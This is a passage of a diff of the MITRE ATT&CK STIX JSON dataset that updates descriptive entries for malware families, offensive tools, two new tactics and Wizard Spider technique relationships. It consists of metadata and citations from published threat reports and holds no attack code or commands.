(2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + }, + { + "source_name": "Dragos DYMALLOY ", + "url": "https://www.dragos.com/threat/dymalloy/", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020." } ], "object_marking_refs": [ @@ -230900,15 +255957,17 @@ "labels": [ "malware" ], - "modified": "2020-03-17T15:08:58.099Z", + "modified": "2020-10-14T22:38:11.328Z", "created": "2017-05-31T21:33:00.176Z", "x_mitre_platforms": [ "Windows" ], "x_mitre_aliases": [ - "Trojan.Karagany" + "Trojan.Karagany", + "xFrost", + "Karagany" ], - "x_mitre_version": "1.1" + "x_mitre_version": "2.0" }, { "id": "malware--c5e9cb46-aced-466c-85ea-7db5572ad9ec", @@ -230992,45 +256051,6 @@ ], "x_mitre_version": "1.1" }, - { - "id": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Twitoor", - "description": "[Twitoor](https://attack.mitre.org/software/S0302) is an Android malware family that likely spreads by SMS or via malicious URLs. (Citation: ESET-Twitoor)", - "external_references": [ - { - "source_name": "mitre-mobile-attack", - "url": "https://attack.mitre.org/software/S0302", - "external_id": "S0302" - }, - { - "source_name": "Twitoor", - "description": "(Citation: ESET-Twitoor)" - }, - { - "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/", - "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.", - "source_name": "ESET-Twitoor" - } - ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "type": "malware", - "labels": [ - "malware" - ], - "modified": "2020-03-30T18:23:32.096Z", - "created": "2017-10-25T14:48:42.313Z", - "x_mitre_platforms": [ - "Android" - ], - "x_mitre_old_attack_id": "MOB-S0018", - "x_mitre_version": "1.3", - "x_mitre_aliases": [ - "Twitoor" - ] - }, { "external_references": [ { @@ -231438,13 +256458,6 @@ "x_mitre_version": "1.1" }, { - "id": "malware--ade37ada-14af-4b44-b36c-210eec255d53", - "name": "Valak", - "description": "[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "external_id": "S0476", @@ -231455,20 +256468,35 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." } ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)", + "name": "Valak", + "id": "malware--ade37ada-14af-4b44-b36c-210eec255d53", "type": "malware", "labels": [ "malware" ], - "modified": "2020-06-24T01:11:42.794Z", + "modified": "2020-10-05T20:59:05.953Z", "created": "2020-06-19T17:11:54.854Z", - "x_mitre_aliases": [ - "Valak" + "x_mitre_contributors": [ + "Cybereason Nocturnus, @nocturnus" ], - "x_mitre_version": "1.0", "x_mitre_platforms": [ "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Valak" ] }, { @@ -231566,7 +256594,7 @@ "id": "malware--1d808f62-cf63-4063-9727-ff6132514c22", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "WEBC2", - "description": "[WEBC2](https://attack.mitre.org/software/S0109) is a backdoor used by [APT1](https://attack.mitre.org/groups/G0006) to retrieve a Web page from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)", + "description": "[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)", "external_references": [ { "source_name": "mitre-attack", @@ -231578,14 +256606,14 @@ "description": "(Citation: Mandiant APT1)" }, { - "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip", + "source_name": "Mandiant APT1 Appendix", "description": "Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.", - "source_name": "Mandiant APT1 Appendix" + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip" }, { - "source_name": "Mandiant APT1", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", - "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + "source_name": "Mandiant APT1" } ], "object_marking_refs": [ @@ -231595,15 +256623,18 @@ "labels": [ "malware" ], - "modified": "2020-03-30T18:27:06.694Z", + "modified": "2020-08-25T21:23:24.223Z", "created": "2017-05-31T21:33:06.433Z", + "x_mitre_contributors": [ + "Wes Hurd" + ], "x_mitre_platforms": [ "Windows" ], "x_mitre_aliases": [ "WEBC2" ], - "x_mitre_version": "1.2" + "x_mitre_version": "2.0" }, { "id": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c", @@ -231754,6 +256785,95 @@ "Jan Miller, CrowdStrike" ] }, + { + "external_references": [ + { + "external_id": "S0515", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0515" + }, + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "WellMail", + "description": "[WellMail](https://attack.mitre.org/software/S0515) is a lightweight malware written in Golang used by [APT29](https://attack.mitre.org/groups/G0016), similar in design and structure to [WellMess](https://attack.mitre.org/software/S0514).(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)", + "id": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-09T15:38:41.755Z", + "created": "2020-09-29T17:48:27.517Z", + "x_mitre_contributors": [ + "Josh Campbell, Cyborg Security, @cyb0rgsecur1ty" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "WellMail" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, + { + "id": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "description": "[WellMess](https://attack.mitre.org/software/S0514) is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29](https://attack.mitre.org/groups/G0016).(Citation: CISA WellMess July 2020)(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)", + "name": "WellMess", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0514", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0514" + }, + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + }, + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-09T19:41:25.983Z", + "created": "2020-09-24T19:39:44.392Z", + "x_mitre_contributors": [ + "Daniyal Naeem, @Mrdaniyalnaeem" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_aliases": [ + "WellMess" + ], + "x_mitre_version": "1.0" + }, { "id": "malware--039814a0-88de-46c5-a4fb-b293db21880a", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -232611,10 +257731,15 @@ "x_mitre_version": "1.0" }, { - "id": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "gh0st RAT", - "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)", + "created": "2017-05-31T21:32:24.937Z", + "modified": "2020-10-16T00:51:36.275Z", + "labels": [ + "malware" + ], + "type": "malware", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -232641,23 +257766,18 @@ "source_name": "Nccgroup Gh0st April 2018" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "type": "malware", - "labels": [ - "malware" - ], - "modified": "2020-03-30T18:35:11.519Z", - "created": "2017-05-31T21:32:24.937Z", - "x_mitre_platforms": [ - "Windows", - "macOS" - ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)", + "name": "gh0st RAT", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "x_mitre_version": "2.2", "x_mitre_aliases": [ "gh0st RAT" ], - "x_mitre_version": "2.1" + "x_mitre_platforms": [ + "Windows", + "macOS" + ] }, { "id": "malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e", @@ -232867,6 +257987,12 @@ ] }, { + "created": "2019-06-04T17:52:28.806Z", + "modified": "2020-10-14T22:25:02.713Z", + "labels": [ + "malware" + ], + "type": "malware", "id": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", "description": "[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)", "name": "njRAT", @@ -232908,12 +258034,6 @@ "source_name": "Trend Micro njRAT 2018" } ], - "type": "malware", - "labels": [ - "malware" - ], - "modified": "2020-03-30T18:39:37.832Z", - "created": "2019-06-04T17:52:28.806Z", "x_mitre_platforms": [ "Windows" ], @@ -232923,7 +258043,7 @@ "LV", "Bladabindi" ], - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "id": "malware--800bdfba-6d66-480f-9f45-15845c05cb5d", @@ -233180,39 +258300,73 @@ { "external_references": [ { + "external_id": "S0154", "source_name": "mitre-attack", - "url": "https://attack.mitre.org/software/S0154", - "external_id": "S0154" + "url": "https://attack.mitre.org/software/S0154" }, { - "url": "https://cobaltstrike.com/downloads/csmanual38.pdf", + "source_name": "cobaltstrike manual", "description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.", - "source_name": "cobaltstrike manual" + "url": "https://cobaltstrike.com/downloads/csmanual38.pdf" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "id": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_aliases": [ + "Cobalt Strike" + ], + "x_mitre_version": "1.5", + "labels": [ + "malware" ], "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, penetration testing tool which bills itself as \u201cadversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors\u201d. Cobalt Strike\u2019s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system. (Citation: cobaltstrike manual)\n\nIn addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: cobaltstrike manual)", "name": "Cobalt Strike", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "id": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_contributors": [ + "Josh Abraham" + ], + "modified": "2020-09-11T13:33:17.392Z" + }, + { + "id": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "name": "CrackMapExec", + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks.(Citation: CME Github September 2018)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0488", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0488" + }, + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], "type": "tool", "labels": [ "tool" ], - "modified": "2020-06-23T19:49:20.159Z", - "created": "2017-12-14T16:46:06.044Z", - "x_mitre_version": "1.3", - "x_mitre_aliases": [ - "Cobalt Strike" - ], - "x_mitre_contributors": [ - "Josh Abraham" - ], + "modified": "2020-07-29T20:19:40.544Z", + "created": "2020-07-17T14:23:05.958Z", "x_mitre_platforms": [ "Windows" - ] + ], + "x_mitre_aliases": [ + "CrackMapExec" + ], + "x_mitre_version": "1.0" }, { "external_references": [ @@ -233731,6 +258885,40 @@ ], "x_mitre_version": "1.1" }, + { + "id": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "name": "MCMD", + "description": "[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0500", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0500" + }, + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "type": "tool", + "labels": [ + "tool" + ], + "modified": "2020-08-20T14:52:23.369Z", + "created": "2020-08-13T17:15:25.702Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "MCMD" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "external_references": [ { @@ -234407,13 +259595,12 @@ "x_mitre_version": "1.1" }, { - "id": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "SDelete", - "description": "[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "created": "2018-04-18T17:59:24.739Z", + "modified": "2020-08-12T21:37:53.804Z", + "labels": [ + "tool" ], + "type": "tool", "external_references": [ { "source_name": "mitre-attack", @@ -234430,19 +259617,20 @@ "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete" } ], - "type": "tool", - "labels": [ - "tool" - ], - "modified": "2019-04-24T00:37:08.653Z", - "created": "2018-04-18T17:59:24.739Z", - "x_mitre_platforms": [ - "Windows" + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], + "description": "[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)", + "name": "SDelete", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153", + "x_mitre_version": "1.2", "x_mitre_aliases": [ "SDelete" ], - "x_mitre_version": "1.1" + "x_mitre_platforms": [ + "Windows" + ] }, { "external_references": [ @@ -235151,7 +260339,7 @@ }, { "source_name": "Wikipedia pwdump", - "description": "Wikipedia. (1985, June 22). pwdump. Retrieved June 22, 2016.", + "description": "Wikipedia. (2007, August 9). pwdump. Retrieved June 22, 2016.", "url": "https://en.wikipedia.org/wiki/Pwdump" } ], @@ -235159,7 +260347,7 @@ "labels": [ "tool" ], - "modified": "2020-03-30T18:40:16.684Z", + "modified": "2020-08-13T20:12:50.895Z", "created": "2017-05-31T21:32:13.051Z", "x_mitre_platforms": [ "Windows" @@ -235589,6 +260777,46 @@ "modified": "2019-07-19T17:43:00.594Z", "created": "2018-10-17T00:14:20.652Z" }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "TA0043", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0043" + } + ], + "name": "Reconnaissance", + "description": "The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.", + "id": "x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592", + "type": "x-mitre-tactic", + "modified": "2020-10-18T02:04:50.842Z", + "created": "2020-10-02T14:48:41.809Z", + "x_mitre_shortname": "reconnaissance" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "TA0042", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0042" + } + ], + "name": "Resource Development", + "description": "The adversary is trying to establish resources they can use to support operations.\n\nResource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.", + "id": "x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400", + "type": "x-mitre-tactic", + "modified": "2020-09-30T16:31:36.322Z", + "created": "2020-09-30T16:11:59.650Z", + "x_mitre_shortname": "resource-development" + }, { "id": "x-mitre-matrix--eafc1b4c-5e56-4965-bd4e-66a6a89c88cc", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -235606,6 +260834,8 @@ ], "type": "x-mitre-matrix", "tactic_refs": [ + "x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592", + "x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400", "x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca", "x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5", "x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92", @@ -235619,9 +260849,811 @@ "x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462", "x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8" ], - "modified": "2020-07-02T14:18:03.651Z", + "modified": "2020-10-27T02:27:31.332Z", "created": "2018-10-17T00:14:20.652Z" }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + } + ], + "id": "relationship--f9d9b5aa-f4d6-46fc-8831-21ca405ab8e5", + "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", + "type": "relationship", + "created": "2020-11-10T15:39:49.352Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has injected malicious DLLs into memory with read, write, and execute permissions.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T15:46:09.219Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + } + ], + "id": "relationship--a1e10048-626c-4e64-9bdb-fd576be8c19f", + "target_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", + "type": "relationship", + "created": "2020-11-10T15:39:49.368Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has gained access to credentials via exported copies of the ntds.dit Active Directory database.(Citation: FireEye KEGTAP SINGLEMALT October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T15:39:49.368Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + } + ], + "id": "relationship--b9dcab92-6b0d-43c7-a122-90eccb016b9d", + "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "type": "relationship", + "created": "2020-11-10T15:39:49.375Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has lured victims into clicking a malicious link delivered through spearphishing.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T15:39:49.375Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + } + ], + "id": "relationship--d87925c8-23ed-4913-81d6-c4d93d65c798", + "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "type": "relationship", + "created": "2020-11-10T15:39:49.385Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has sent phishing emails containing a link to an actor-controlled Google Drive document or other free online file hosting services.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T15:46:09.451Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + } + ], + "id": "relationship--72b30ddb-137c-4799-bacd-ab17aa2d01fc", + "target_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", + "type": "relationship", + "created": "2020-11-10T16:04:00.641Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Rubeus, MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet to steal AES hashes.(Citation: DFIR Ryuk's Return October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T16:04:00.641Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + } + ], + "id": "relationship--f947ae1c-1042-469d-b00e-84784e406cec", + "target_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "type": "relationship", + "created": "2020-11-10T16:04:00.714Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Window Remote Management to move laterally through a victim network.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": 